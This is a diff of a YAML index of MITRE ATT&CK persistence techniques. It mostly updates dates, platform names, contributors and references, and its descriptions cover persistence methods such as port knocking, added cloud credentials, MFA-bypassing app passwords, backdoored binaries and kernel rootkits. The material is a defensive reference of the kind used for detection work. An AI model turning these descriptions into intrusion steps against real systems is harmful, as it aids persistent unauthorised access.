       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -35203,7 +35604,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -35264,7 +35664,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -35340,7 +35739,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -35368,8 +35767,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests:
     - name: Add macOS LoginItem using Applescript
@@ -35423,7 +35820,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -35448,23 +35845,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -35474,11 +35869,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -35489,12 +35888,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -35503,6 +35909,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -35511,13 +35918,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -35543,10 +35953,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -35555,10 +35973,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -35575,14 +36003,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -35657,7 +36082,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -35746,24 +36170,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -35777,7 +36204,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -35792,6 +36219,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -35805,11 +36237,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -35835,7 +36266,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -35849,7 +36279,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -35876,8 +36305,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -35888,7 +36317,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -35929,7 +36359,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -35949,7 +36379,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests:
     - name: Persistance with Event Monitor - emond
@@ -35976,7 +36405,7 @@ persistence:
         elevation_required: true
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -36030,11 +36459,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -36121,9 +36549,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -36136,12 +36564,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -36154,9 +36581,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -36165,13 +36594,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -36219,14 +36648,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -36262,16 +36688,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -36312,143 +36737,141 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
